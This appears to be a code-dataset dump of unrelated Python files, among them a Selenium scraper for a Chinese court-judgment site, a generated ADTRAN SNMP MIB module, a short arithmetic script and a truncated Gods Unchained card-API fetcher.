{ "blob_id": "01de85b0d480c105c8cc1a8154c3de936ab3226d", "index": 9143, "step-1": "<mask token>\n\n\ndef sleep(min_seconds=1, max_seconds=10):\n \"\"\"Allow a browser instance to wait for a few seconds before do something\"\"\"\n time.sleep(randint(min_seconds, max_seconds))\n\n\ndef click(elem):\n try:\n elem.click()\n except ElementNotInteractableException:\n pass\n\n\ndef open_website(url):\n \"\"\"\n Open website of target url\n \"\"\"\n browser = webdriver.Firefox()\n browser.get(url)\n return browser\n\n\ndef is_finished(browser):\n finish_text = '无符合条件的数据...'\n sleep_secs = 15\n time.sleep(sleep_secs)\n result_list = browser.find_element_by_id('resultList')\n if finish_text in result_list.text:\n logger.info('Try refresh to reload content')\n browser.refresh()\n time.sleep(sleep_secs)\n result_list = browser.find_element_by_id('resultList')\n if finish_text in result_list.text:\n return True\n return False\n\n\n<mask token>\n\n\n@retry(times=5, delay=5, allowed_exceptions=IndexError)\ndef save_doc(browser, doc_elem, save_dir):\n doc_key = doc_elem.get_attribute('key')\n doc_title = doc_elem.get_attribute('title')\n logger.info('Found document %s.' % doc_title)\n unzipped_id = browser.execute_script('return unzip(\"%s\")' % doc_key)\n doc_id = browser.execute_script('return com.str.Decrypt(\"%s\")' %\n unzipped_id)\n doc_link = DOC_LINK_BASE % doc_id\n headers = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'\n }\n p = re.compile('(var jsonHtmlData = \")(.+)(\\\\\"}\";)')\n resp = requests.get(doc_link, headers=headers)\n resp_text = resp.text\n resp_obj = p.findall(resp_text)[0][1].replace('\\\\', '') + '\"}'\n resp_obj = json.loads(resp_obj)\n os.makedirs(save_dir, exist_ok=True)\n with open(os.path.join(save_dir, resp_obj['Title'] + '.html'), 'w') as f:\n f.write(resp_obj['Html'])\n logger.info('Downloaded %s.' % resp_obj['Title'])\n", "step-2": "<mask token>\n\n\ndef sleep(min_seconds=1, max_seconds=10):\n \"\"\"Allow a browser instance to wait for a few seconds before do something\"\"\"\n time.sleep(randint(min_seconds, max_seconds))\n\n\ndef click(elem):\n try:\n elem.click()\n except ElementNotInteractableException:\n pass\n\n\ndef open_website(url):\n \"\"\"\n Open website of target url\n \"\"\"\n browser = webdriver.Firefox()\n browser.get(url)\n return browser\n\n\ndef is_finished(browser):\n finish_text = '无符合条件的数据...'\n sleep_secs = 15\n time.sleep(sleep_secs)\n result_list = browser.find_element_by_id('resultList')\n if finish_text in result_list.text:\n logger.info('Try refresh to reload content')\n browser.refresh()\n time.sleep(sleep_secs)\n result_list = browser.find_element_by_id('resultList')\n if finish_text in result_list.text:\n return True\n return False\n\n\ndef download_docs(browser, save_dir='./', click_next_page=False):\n if click_next_page:\n next_page = browser.find_elements(By.XPATH,\n '//*[@id=\"pageNumber\"]/a[contains(text(), \"下一页\")]')\n next_page[0].click()\n if is_finished(browser):\n logger.info('Finished downloading documents in this page.')\n return\n link_xpath = '//*[@class=\"dataItem\"]'\n keywords_elems = browser.find_elements(By.XPATH,\n '//*[@class=\"contentCondtion\"]')\n subfolder = '-'.join([el.text for el in keywords_elems])\n elems = browser.find_elements(By.XPATH, link_xpath)\n for el in elems:\n save_doc(browser, el, os.path.join(save_dir, subfolder))\n time.sleep(1)\n download_docs(browser, save_dir, click_next_page=True)\n\n\n@retry(times=5, delay=5, allowed_exceptions=IndexError)\ndef save_doc(browser, doc_elem, save_dir):\n doc_key = doc_elem.get_attribute('key')\n doc_title = doc_elem.get_attribute('title')\n logger.info('Found document %s.' % doc_title)\n unzipped_id = browser.execute_script('return unzip(\"%s\")' % doc_key)\n doc_id = browser.execute_script('return com.str.Decrypt(\"%s\")' %\n unzipped_id)\n doc_link = DOC_LINK_BASE % doc_id\n headers = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'\n }\n p = re.compile('(var jsonHtmlData = \")(.+)(\\\\\"}\";)')\n resp = requests.get(doc_link, headers=headers)\n resp_text = resp.text\n resp_obj = p.findall(resp_text)[0][1].replace('\\\\', '') + '\"}'\n resp_obj = json.loads(resp_obj)\n os.makedirs(save_dir, exist_ok=True)\n with open(os.path.join(save_dir, resp_obj['Title'] + '.html'), 'w') as f:\n f.write(resp_obj['Html'])\n logger.info('Downloaded %s.' % resp_obj['Title'])\n", "step-3": "<mask token>\nlogger = get_logger(__name__)\n\n\ndef sleep(min_seconds=1, max_seconds=10):\n \"\"\"Allow a browser instance to wait for a few seconds before do something\"\"\"\n time.sleep(randint(min_seconds, max_seconds))\n\n\ndef click(elem):\n try:\n elem.click()\n except ElementNotInteractableException:\n pass\n\n\ndef open_website(url):\n \"\"\"\n Open website of target url\n \"\"\"\n browser = webdriver.Firefox()\n browser.get(url)\n return browser\n\n\ndef is_finished(browser):\n finish_text = '无符合条件的数据...'\n sleep_secs = 15\n time.sleep(sleep_secs)\n result_list = browser.find_element_by_id('resultList')\n if finish_text in result_list.text:\n logger.info('Try refresh to reload content')\n browser.refresh()\n time.sleep(sleep_secs)\n result_list = browser.find_element_by_id('resultList')\n if finish_text in result_list.text:\n return True\n return False\n\n\ndef download_docs(browser, save_dir='./', click_next_page=False):\n if click_next_page:\n next_page = browser.find_elements(By.XPATH,\n '//*[@id=\"pageNumber\"]/a[contains(text(), \"下一页\")]')\n next_page[0].click()\n if is_finished(browser):\n logger.info('Finished downloading documents in this page.')\n return\n link_xpath = '//*[@class=\"dataItem\"]'\n keywords_elems = browser.find_elements(By.XPATH,\n '//*[@class=\"contentCondtion\"]')\n subfolder = '-'.join([el.text for el in keywords_elems])\n elems = browser.find_elements(By.XPATH, link_xpath)\n for el in elems:\n save_doc(browser, el, os.path.join(save_dir, subfolder))\n time.sleep(1)\n download_docs(browser, save_dir, click_next_page=True)\n\n\n@retry(times=5, delay=5, allowed_exceptions=IndexError)\ndef save_doc(browser, doc_elem, save_dir):\n doc_key = doc_elem.get_attribute('key')\n doc_title = doc_elem.get_attribute('title')\n logger.info('Found document %s.' % doc_title)\n unzipped_id = browser.execute_script('return unzip(\"%s\")' % doc_key)\n doc_id = browser.execute_script('return com.str.Decrypt(\"%s\")' %\n unzipped_id)\n doc_link = DOC_LINK_BASE % doc_id\n headers = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'\n }\n p = re.compile('(var jsonHtmlData = \")(.+)(\\\\\"}\";)')\n resp = requests.get(doc_link, headers=headers)\n resp_text = resp.text\n resp_obj = p.findall(resp_text)[0][1].replace('\\\\', '') + '\"}'\n resp_obj = json.loads(resp_obj)\n os.makedirs(save_dir, exist_ok=True)\n with open(os.path.join(save_dir, resp_obj['Title'] + '.html'), 'w') as f:\n f.write(resp_obj['Html'])\n logger.info('Downloaded %s.' % resp_obj['Title'])\n", "step-4": "import time\nimport itertools\nimport re\nimport requests\nimport json\nimport os\nfrom random import randint\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import ElementNotInteractableException\nfrom .exceptions import UnsupportedPlatformException\nfrom .config import get_logger, DOC_LINK_BASE\nfrom .utils import retry\nlogger = get_logger(__name__)\n\n\ndef sleep(min_seconds=1, max_seconds=10):\n \"\"\"Allow a browser instance to wait for a few seconds before do something\"\"\"\n time.sleep(randint(min_seconds, max_seconds))\n\n\ndef click(elem):\n try:\n elem.click()\n except ElementNotInteractableException:\n pass\n\n\ndef open_website(url):\n \"\"\"\n Open website of target url\n \"\"\"\n browser = webdriver.Firefox()\n browser.get(url)\n return browser\n\n\ndef is_finished(browser):\n finish_text = '无符合条件的数据...'\n sleep_secs = 15\n time.sleep(sleep_secs)\n result_list = browser.find_element_by_id('resultList')\n if finish_text in result_list.text:\n logger.info('Try refresh to reload content')\n browser.refresh()\n time.sleep(sleep_secs)\n result_list = browser.find_element_by_id('resultList')\n if finish_text in result_list.text:\n return True\n return False\n\n\ndef download_docs(browser, save_dir='./', click_next_page=False):\n if click_next_page:\n next_page = browser.find_elements(By.XPATH,\n '//*[@id=\"pageNumber\"]/a[contains(text(), \"下一页\")]')\n next_page[0].click()\n if is_finished(browser):\n logger.info('Finished downloading documents in this page.')\n return\n link_xpath = '//*[@class=\"dataItem\"]'\n keywords_elems = browser.find_elements(By.XPATH,\n '//*[@class=\"contentCondtion\"]')\n subfolder = '-'.join([el.text for el in keywords_elems])\n elems = browser.find_elements(By.XPATH, link_xpath)\n for el in elems:\n save_doc(browser, el, os.path.join(save_dir, subfolder))\n time.sleep(1)\n download_docs(browser, save_dir, click_next_page=True)\n\n\n@retry(times=5, delay=5, allowed_exceptions=IndexError)\ndef save_doc(browser, doc_elem, save_dir):\n doc_key = doc_elem.get_attribute('key')\n doc_title = doc_elem.get_attribute('title')\n logger.info('Found document %s.' % doc_title)\n unzipped_id = browser.execute_script('return unzip(\"%s\")' % doc_key)\n doc_id = browser.execute_script('return com.str.Decrypt(\"%s\")' %\n unzipped_id)\n doc_link = DOC_LINK_BASE % doc_id\n headers = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'\n }\n p = re.compile('(var jsonHtmlData = \")(.+)(\\\\\"}\";)')\n resp = requests.get(doc_link, headers=headers)\n resp_text = resp.text\n resp_obj = p.findall(resp_text)[0][1].replace('\\\\', '') + '\"}'\n resp_obj = json.loads(resp_obj)\n os.makedirs(save_dir, exist_ok=True)\n with open(os.path.join(save_dir, resp_obj['Title'] + '.html'), 'w') as f:\n f.write(resp_obj['Html'])\n logger.info('Downloaded %s.' % resp_obj['Title'])\n", "step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# File: wenshu/actions.py\n# Author: Carolusian <https://github.com/carolusian>\n# Date: 22.09.2018\n# Last Modified Date: 22.09.2018\n#\n# Copyright 2018 Carolusian\n\nimport time\nimport itertools\nimport re\nimport requests\nimport json\nimport os\nfrom random import randint\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import ElementNotInteractableException\nfrom .exceptions import UnsupportedPlatformException\n\nfrom .config import get_logger, DOC_LINK_BASE\nfrom .utils import retry\n\n\nlogger = get_logger(__name__)\n\n\ndef sleep(min_seconds=1, max_seconds=10):\n \"\"\"Allow a browser instance to wait for a few seconds before do something\"\"\"\n time.sleep(randint(min_seconds, max_seconds))\n\n\ndef click(elem):\n try:\n elem.click()\n except ElementNotInteractableException:\n pass\n\n\ndef open_website(url):\n \"\"\"\n Open website of target url\n \"\"\"\n browser = webdriver.Firefox()\n browser.get(url)\n return browser\n\n\ndef is_finished(browser):\n finish_text = '无符合条件的数据...'\n sleep_secs = 15\n time.sleep(sleep_secs)\n result_list = browser.find_element_by_id('resultList')\n # Refresh if no result found\n if finish_text in result_list.text:\n logger.info('Try refresh to reload content')\n browser.refresh()\n time.sleep(sleep_secs)\n\n # If still not result found, finish downloading\n result_list = browser.find_element_by_id('resultList')\n if finish_text in result_list.text:\n return True\n return False\n\n\ndef download_docs(browser, save_dir='./', click_next_page=False): \n if click_next_page:\n next_page = browser.find_elements(By.XPATH, '//*[@id=\"pageNumber\"]/a[contains(text(), \"下一页\")]')\n next_page[0].click()\n if is_finished(browser):\n logger.info('Finished downloading documents in this page.')\n return\n\n link_xpath = '//*[@class=\"dataItem\"]'\n keywords_elems = browser.find_elements(By.XPATH, '//*[@class=\"contentCondtion\"]')\n subfolder = '-'.join([el.text for el in keywords_elems])\n elems = browser.find_elements(By.XPATH, link_xpath)\n for el in elems:\n save_doc(browser, el, os.path.join(save_dir, subfolder))\n time.sleep(1)\n\n # Goto next page after this page is download\n download_docs(browser, save_dir, click_next_page=True)\n\n\n@retry(times=5, delay=5, allowed_exceptions=IndexError)\ndef save_doc(browser, doc_elem, save_dir):\n doc_key = doc_elem.get_attribute('key')\n doc_title = doc_elem.get_attribute('title')\n logger.info('Found document %s.' % doc_title)\n\n unzipped_id = browser.execute_script('return unzip(\"%s\")' % doc_key)\n doc_id = browser.execute_script('return com.str.Decrypt(\"%s\")' % unzipped_id)\n doc_link = DOC_LINK_BASE % doc_id\n\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n p = re.compile('(var jsonHtmlData = \")(.+)(\\\\\"}\";)')\n \n resp = requests.get(doc_link, headers=headers)\n resp_text = resp.text\n\n resp_obj = p.findall(resp_text)[0][1].replace('\\\\', '') + '\"}'\n resp_obj = json.loads(resp_obj)\n\n os.makedirs(save_dir, exist_ok=True)\n with open(os.path.join(save_dir, resp_obj['Title'] + '.html'), 'w') as f:\n f.write(resp_obj['Html'])\n logger.info('Downloaded %s.' % resp_obj['Title'])\n\n\n \n\n\n", "step-ids": [ 5, 6, 7, 8, 9 ] }
[ 5, 6, 7, 8, 9 ]
# # PySNMP MIB module ADTRAN-ATLAS-HSSI-V35-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ADTRAN-ATLAS-HSSI-V35-MIB # Produced by pysmi-0.3.4 at Mon Apr 29 16:59:09 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # adATLASModuleInfoFPStatus, = mibBuilder.importSymbols("ADTRAN-ATLAS-MODULE-MIB", "adATLASModuleInfoFPStatus") adATLASUnitSlotAddress, adATLASUnitFPStatus, adATLASUnitPortAddress = mibBuilder.importSymbols("ADTRAN-ATLAS-UNIT-MIB", "adATLASUnitSlotAddress", "adATLASUnitFPStatus", "adATLASUnitPortAddress") ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint") ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex") ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup") MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, Gauge32, Integer32, Counter64, IpAddress, ModuleIdentity, ObjectIdentity, iso, Unsigned32, Counter32, MibIdentifier, NotificationType, NotificationType, enterprises, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "Gauge32", "Integer32", "Counter64", "IpAddress", "ModuleIdentity", "ObjectIdentity", "iso", "Unsigned32", "Counter32", "MibIdentifier", "NotificationType", "NotificationType", "enterprises", "TimeTicks") DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention") adtran = MibIdentifier((1, 3, 6, 1, 4, 1, 664)) adMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2)) adATLASmg = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2, 154)) adGenATLASmg = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2, 154, 1)) adATLASHSSIV35mg = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 11)) adATLASHSSIV35IfceDeact = NotificationType((1, 3, 6, 1, 4, 1, 664, 2, 154) + (0,15401100)).setObjects(("IF-MIB", "ifIndex"), ("ADTRAN-ATLAS-UNIT-MIB", "adATLASUnitSlotAddress"), ("ADTRAN-ATLAS-UNIT-MIB", "adATLASUnitPortAddress"), ("ADTRAN-ATLAS-MODULE-MIB", "adATLASModuleInfoFPStatus"), ("ADTRAN-ATLAS-UNIT-MIB", "adATLASUnitFPStatus")) adATLASHSSIV35IfceReact = NotificationType((1, 3, 6, 1, 4, 1, 664, 2, 154) + (0,15401101)).setObjects(("IF-MIB", "ifIndex"), ("ADTRAN-ATLAS-UNIT-MIB", "adATLASUnitSlotAddress"), ("ADTRAN-ATLAS-UNIT-MIB", "adATLASUnitPortAddress"), ("ADTRAN-ATLAS-MODULE-MIB", "adATLASModuleInfoFPStatus"), ("ADTRAN-ATLAS-UNIT-MIB", "adATLASUnitFPStatus")) mibBuilder.exportSymbols("ADTRAN-ATLAS-HSSI-V35-MIB", adtran=adtran, adMgmt=adMgmt, adATLASHSSIV35IfceReact=adATLASHSSIV35IfceReact, adGenATLASmg=adGenATLASmg, adATLASmg=adATLASmg, adATLASHSSIV35IfceDeact=adATLASHSSIV35IfceDeact, adATLASHSSIV35mg=adATLASHSSIV35mg)
normal
{ "blob_id": "309807e04bfbf6c32b7105fe87d6ad1247ae411a", "index": 3192, "step-1": "<mask token>\n", "step-2": "<mask token>\nmibBuilder.exportSymbols('ADTRAN-ATLAS-HSSI-V35-MIB', adtran=adtran, adMgmt\n =adMgmt, adATLASHSSIV35IfceReact=adATLASHSSIV35IfceReact, adGenATLASmg=\n adGenATLASmg, adATLASmg=adATLASmg, adATLASHSSIV35IfceDeact=\n adATLASHSSIV35IfceDeact, adATLASHSSIV35mg=adATLASHSSIV35mg)\n", "step-3": "adATLASModuleInfoFPStatus, = mibBuilder.importSymbols('ADTRAN-ATLAS-MODULE-MIB'\n , 'adATLASModuleInfoFPStatus')\nadATLASUnitSlotAddress, adATLASUnitFPStatus, adATLASUnitPortAddress = (\n mibBuilder.importSymbols('ADTRAN-ATLAS-UNIT-MIB',\n 'adATLASUnitSlotAddress', 'adATLASUnitFPStatus', 'adATLASUnitPortAddress'))\nObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols('ASN1',\n 'ObjectIdentifier', 'Integer', 'OctetString')\nNamedValues, = mibBuilder.importSymbols('ASN1-ENUMERATION', 'NamedValues')\n(SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion,\n ConstraintsIntersection, ValueSizeConstraint) = (mibBuilder.\n importSymbols('ASN1-REFINEMENT', 'SingleValueConstraint',\n 'ValueRangeConstraint', 'ConstraintsUnion', 'ConstraintsIntersection',\n 'ValueSizeConstraint'))\nifIndex, = mibBuilder.importSymbols('IF-MIB', 'ifIndex')\nModuleCompliance, NotificationGroup = mibBuilder.importSymbols('SNMPv2-CONF',\n 'ModuleCompliance', 'NotificationGroup')\n(MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, Gauge32, Integer32,\n Counter64, IpAddress, ModuleIdentity, ObjectIdentity, iso, Unsigned32,\n Counter32, MibIdentifier, NotificationType, NotificationType,\n enterprises, TimeTicks) = (mibBuilder.importSymbols('SNMPv2-SMI',\n 'MibScalar', 'MibTable', 'MibTableRow', 'MibTableColumn', 'Bits',\n 'Gauge32', 'Integer32', 'Counter64', 'IpAddress', 'ModuleIdentity',\n 'ObjectIdentity', 'iso', 'Unsigned32', 'Counter32', 'MibIdentifier',\n 'NotificationType', 'NotificationType', 'enterprises', 'TimeTicks'))\nDisplayString, TextualConvention = mibBuilder.importSymbols('SNMPv2-TC',\n 'DisplayString', 'TextualConvention')\nadtran = MibIdentifier((1, 3, 6, 1, 4, 1, 664))\nadMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2))\nadATLASmg = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2, 154))\nadGenATLASmg = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2, 154, 1))\nadATLASHSSIV35mg = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 11))\nadATLASHSSIV35IfceDeact = NotificationType((1, 3, 6, 1, 4, 1, 664, 2, 154) +\n (0, 15401100)).setObjects(('IF-MIB', 'ifIndex'), (\n 'ADTRAN-ATLAS-UNIT-MIB', 'adATLASUnitSlotAddress'), (\n 'ADTRAN-ATLAS-UNIT-MIB', 'adATLASUnitPortAddress'), (\n 'ADTRAN-ATLAS-MODULE-MIB', 'adATLASModuleInfoFPStatus'), (\n 'ADTRAN-ATLAS-UNIT-MIB', 'adATLASUnitFPStatus'))\nadATLASHSSIV35IfceReact = NotificationType((1, 3, 6, 1, 4, 1, 664, 2, 154) +\n (0, 15401101)).setObjects(('IF-MIB', 'ifIndex'), (\n 'ADTRAN-ATLAS-UNIT-MIB', 'adATLASUnitSlotAddress'), (\n 'ADTRAN-ATLAS-UNIT-MIB', 'adATLASUnitPortAddress'), (\n 'ADTRAN-ATLAS-MODULE-MIB', 'adATLASModuleInfoFPStatus'), (\n 'ADTRAN-ATLAS-UNIT-MIB', 'adATLASUnitFPStatus'))\nmibBuilder.exportSymbols('ADTRAN-ATLAS-HSSI-V35-MIB', adtran=adtran, adMgmt\n =adMgmt, adATLASHSSIV35IfceReact=adATLASHSSIV35IfceReact, adGenATLASmg=\n adGenATLASmg, adATLASmg=adATLASmg, adATLASHSSIV35IfceDeact=\n adATLASHSSIV35IfceDeact, adATLASHSSIV35mg=adATLASHSSIV35mg)\n", "step-4": "#\n# PySNMP MIB module ADTRAN-ATLAS-HSSI-V35-MIB (http://snmplabs.com/pysmi)\n# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ADTRAN-ATLAS-HSSI-V35-MIB\n# Produced by pysmi-0.3.4 at Mon Apr 29 16:59:09 2019\n# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4\n# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) \n#\nadATLASModuleInfoFPStatus, = mibBuilder.importSymbols(\"ADTRAN-ATLAS-MODULE-MIB\", \"adATLASModuleInfoFPStatus\")\nadATLASUnitSlotAddress, adATLASUnitFPStatus, adATLASUnitPortAddress = mibBuilder.importSymbols(\"ADTRAN-ATLAS-UNIT-MIB\", \"adATLASUnitSlotAddress\", \"adATLASUnitFPStatus\", \"adATLASUnitPortAddress\")\nObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols(\"ASN1\", \"ObjectIdentifier\", \"Integer\", \"OctetString\")\nNamedValues, = mibBuilder.importSymbols(\"ASN1-ENUMERATION\", \"NamedValues\")\nSingleValueConstraint, ValueRangeConstraint, ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols(\"ASN1-REFINEMENT\", \"SingleValueConstraint\", \"ValueRangeConstraint\", \"ConstraintsUnion\", \"ConstraintsIntersection\", \"ValueSizeConstraint\")\nifIndex, = mibBuilder.importSymbols(\"IF-MIB\", \"ifIndex\")\nModuleCompliance, NotificationGroup = mibBuilder.importSymbols(\"SNMPv2-CONF\", \"ModuleCompliance\", \"NotificationGroup\")\nMibScalar, MibTable, MibTableRow, MibTableColumn, Bits, Gauge32, Integer32, Counter64, IpAddress, ModuleIdentity, ObjectIdentity, iso, Unsigned32, Counter32, MibIdentifier, NotificationType, NotificationType, enterprises, TimeTicks = mibBuilder.importSymbols(\"SNMPv2-SMI\", \"MibScalar\", \"MibTable\", \"MibTableRow\", \"MibTableColumn\", \"Bits\", \"Gauge32\", \"Integer32\", \"Counter64\", \"IpAddress\", \"ModuleIdentity\", \"ObjectIdentity\", \"iso\", \"Unsigned32\", \"Counter32\", \"MibIdentifier\", \"NotificationType\", \"NotificationType\", \"enterprises\", \"TimeTicks\")\nDisplayString, TextualConvention = mibBuilder.importSymbols(\"SNMPv2-TC\", \"DisplayString\", \"TextualConvention\")\nadtran = MibIdentifier((1, 3, 6, 1, 4, 1, 664))\nadMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2))\nadATLASmg = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2, 154))\nadGenATLASmg = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2, 154, 1))\nadATLASHSSIV35mg = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 11))\nadATLASHSSIV35IfceDeact = NotificationType((1, 3, 6, 1, 4, 1, 664, 2, 154) + (0,15401100)).setObjects((\"IF-MIB\", \"ifIndex\"), (\"ADTRAN-ATLAS-UNIT-MIB\", \"adATLASUnitSlotAddress\"), (\"ADTRAN-ATLAS-UNIT-MIB\", \"adATLASUnitPortAddress\"), (\"ADTRAN-ATLAS-MODULE-MIB\", \"adATLASModuleInfoFPStatus\"), (\"ADTRAN-ATLAS-UNIT-MIB\", \"adATLASUnitFPStatus\"))\nadATLASHSSIV35IfceReact = NotificationType((1, 3, 6, 1, 4, 1, 664, 2, 154) + (0,15401101)).setObjects((\"IF-MIB\", \"ifIndex\"), (\"ADTRAN-ATLAS-UNIT-MIB\", \"adATLASUnitSlotAddress\"), (\"ADTRAN-ATLAS-UNIT-MIB\", \"adATLASUnitPortAddress\"), (\"ADTRAN-ATLAS-MODULE-MIB\", \"adATLASModuleInfoFPStatus\"), (\"ADTRAN-ATLAS-UNIT-MIB\", \"adATLASUnitFPStatus\"))\nmibBuilder.exportSymbols(\"ADTRAN-ATLAS-HSSI-V35-MIB\", adtran=adtran, adMgmt=adMgmt, adATLASHSSIV35IfceReact=adATLASHSSIV35IfceReact, adGenATLASmg=adGenATLASmg, adATLASmg=adATLASmg, adATLASHSSIV35IfceDeact=adATLASHSSIV35IfceDeact, adATLASHSSIV35mg=adATLASHSSIV35mg)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
h = int(input()) a = int(input()) b = int(input()) c = (h - b + a - b - 1) // (a - b) print(int(c))
normal
{ "blob_id": "eea962d6c519bee802c346fcf8d0c7410e00c30b", "index": 9587, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(int(c))\n", "step-3": "h = int(input())\na = int(input())\nb = int(input())\nc = (h - b + a - b - 1) // (a - b)\nprint(int(c))\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
import requests import time import csv import os import pandas as pd col_list1 = ["cardtype","username_opensea", "address", "username_game"] df1 = pd.read_csv("profiles.csv", usecols=col_list1) # for j in range(0,len(df1) ): #usernames in opensea print(j) user=[] proto=[] purity=[] card_name=[] card_effect=[] god=[] rarity=[] mana=[] type=[] set=[] print(df1['address'][j]) url1 = "https://api.godsunchained.com/v0/card?user="+df1['address'][j]+"&perPage=150000" print (url1) response = requests.request("GET", url1) data = response.json() number_cards=data['total'] if number_cards!=0: for i in range(0, number_cards): user.append(data['records'][i]['user']) proto.append(data['records'][i]['proto']) url2 = "https://api.godsunchained.com/v0/proto/" + str(proto[i]) purity.append(data['records'][i]['purity']) # response2 = requests.request("GET", url2) # data2 = response2.json() # if data2['name']!=None: # card_name.append(data2['name']) # card_effect.append(data2['effect']) # god.append(data2['god']) # rarity.append(data2['rarity']) # mana.append(data2['god']) # type.append(data2['type']) # set.append(data2['set']) # else: # card_name.append(None) # card_effect.append(None) # god.append(None) # rarity.append(None) # mana.append(None) # type.append(None) # set.append(None) dict={ 'user': user, 'proto_number': proto, # 'card_name':card_name, 'purity': purity, # 'card_effect': card_effect, # 'god':god, # 'rarity':rarity, # 'mana': mana, # 'type': type, # 'set': set } df = pd.DataFrame(dict) path = 'C:\\Users\\...' df.to_csv(os.path.join(path, str(user[0]) + ".csv"), index=False)
normal
{ "blob_id": "93909ab98f1141940e64e079e09834ae5ad3995f", "index": 6537, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor j in range(0, len(df1)):\n print(j)\n user = []\n proto = []\n purity = []\n card_name = []\n card_effect = []\n god = []\n rarity = []\n mana = []\n type = []\n set = []\n print(df1['address'][j])\n url1 = 'https://api.godsunchained.com/v0/card?user=' + df1['address'][j\n ] + '&perPage=150000'\n print(url1)\n response = requests.request('GET', url1)\n data = response.json()\n number_cards = data['total']\n if number_cards != 0:\n for i in range(0, number_cards):\n user.append(data['records'][i]['user'])\n proto.append(data['records'][i]['proto'])\n url2 = 'https://api.godsunchained.com/v0/proto/' + str(proto[i])\n purity.append(data['records'][i]['purity'])\n dict = {'user': user, 'proto_number': proto, 'purity': purity}\n df = pd.DataFrame(dict)\n path = 'C:\\\\Users\\\\...'\n df.to_csv(os.path.join(path, str(user[0]) + '.csv'), index=False)\n", "step-3": "<mask token>\ncol_list1 = ['cardtype', 'username_opensea', 'address', 'username_game']\ndf1 = pd.read_csv('profiles.csv', usecols=col_list1)\nfor j in range(0, len(df1)):\n print(j)\n user = []\n proto = []\n purity = []\n card_name = []\n card_effect = []\n god = []\n rarity = []\n mana = []\n type = []\n set = []\n print(df1['address'][j])\n url1 = 'https://api.godsunchained.com/v0/card?user=' + df1['address'][j\n ] + '&perPage=150000'\n print(url1)\n response = requests.request('GET', url1)\n data = response.json()\n number_cards = data['total']\n if number_cards != 0:\n for i in range(0, number_cards):\n user.append(data['records'][i]['user'])\n proto.append(data['records'][i]['proto'])\n url2 = 'https://api.godsunchained.com/v0/proto/' + str(proto[i])\n purity.append(data['records'][i]['purity'])\n dict = {'user': user, 'proto_number': proto, 'purity': purity}\n df = pd.DataFrame(dict)\n path = 'C:\\\\Users\\\\...'\n df.to_csv(os.path.join(path, str(user[0]) + '.csv'), index=False)\n", "step-4": "import requests\nimport time\nimport csv\nimport os\nimport pandas as pd\ncol_list1 = ['cardtype', 'username_opensea', 'address', 'username_game']\ndf1 = pd.read_csv('profiles.csv', usecols=col_list1)\nfor j in range(0, len(df1)):\n print(j)\n user = []\n proto = []\n purity = []\n card_name = []\n card_effect = []\n god = []\n rarity = []\n mana = []\n type = []\n set = []\n print(df1['address'][j])\n url1 = 'https://api.godsunchained.com/v0/card?user=' + 